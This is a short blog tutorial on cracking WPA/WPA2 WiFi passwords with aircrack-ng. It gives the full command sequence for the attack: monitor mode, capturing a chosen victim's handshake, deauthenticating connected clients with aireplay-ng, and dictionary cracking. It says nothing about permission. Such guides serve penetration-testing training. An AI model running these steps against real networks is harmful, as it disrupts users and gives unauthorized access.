Hello Everyone! welcome to pentestguy. In this article we are going to see wifi penetration testing using aircrack-ng. As we know there are many ways of wifi penetration testing but via aircrack-ng is the easy one and old school method.
What is Aircrack-ng?
Aircrack-ng is a complete suite of tools to assess WiFi network security. It focuses on different areas of WiFi security:
Monitoring: Packet capture and export of data to text files for further processing by third party tools.
Attacking: Replay attacks, deauthentication, fake access points and others via packet injection.
Testing: Checking WiFi cards and driver capabilities
Cracking: WEP and WPA PSK
Basic Requirement:- Kali Linux, TP-Link TL-WN722N or Alfa.
Check for external WiFi adapter
Plug in the external wifi adapter (TP-Link TL-WN722N(current one not supported) or Alfa wireless adapter). Can also use inbuilt one, only need to check whether it supports the packet injection, and check it using the below command.
ifconfig
In following case, the name of adapter is wlan0 but sometime it may be wlan1 its depend on your device.
Monitor Mode
Put you wifi adapter on monitor mode, to sniff all traffic of different channels.
sudo airmon-ng start wlan0
Here “ wlan0mon ” is monitor mode interface, it may be different in your case.
Start Sniffing for all traffics
Start sniffing wifi around you and choose specific victim.
airodump-ng wlan0mon
Now you can see many access point with their clients (PC,Laptop,Mobile) which have with in range of your wifi card.
Sniff for target
Identify the target and start to capturing packets for the target only where you can capture the WPA handshake by using following command.
airodump-ng –bssid 10:BE:XX:XX:XX:XX –channel 7 –write testoutput wlan0mon
Check that any client is connected or not because it is very necessary to capture packets.
Note:- Do not close this process while the handshake is not capture
Deauthenticate target clients
At the same time open new terminal and Deauthenticate clients from the access point and capture the wpa/wpa2 handshake.
Both process keep active whenever not capture handshake.
aireplay-ng –deauth 0 -a 10:BE:XX:XX:XX:XX -c 42:60:XX:XX:XX:XX wlan0mon
Check the airmon-ng terminal for target, on right side it show that capture handshake.
Crack the hash
After capturing handshake close all terminal and try to crack hash by using different tools like aircrack-ng, hashcat.
aircrack-ng -w password-list.txt testoutput-01.cap
Try good password dictionaries to crack hash to crack password like seclists or can create own word lists using tool like crunch.
If you found this post helpful then please share it with your co-workers and friends. Please provide your valuable comment and let us know if there is any suggestion. Now you can also collab with us please check our collaboration page, thank you!
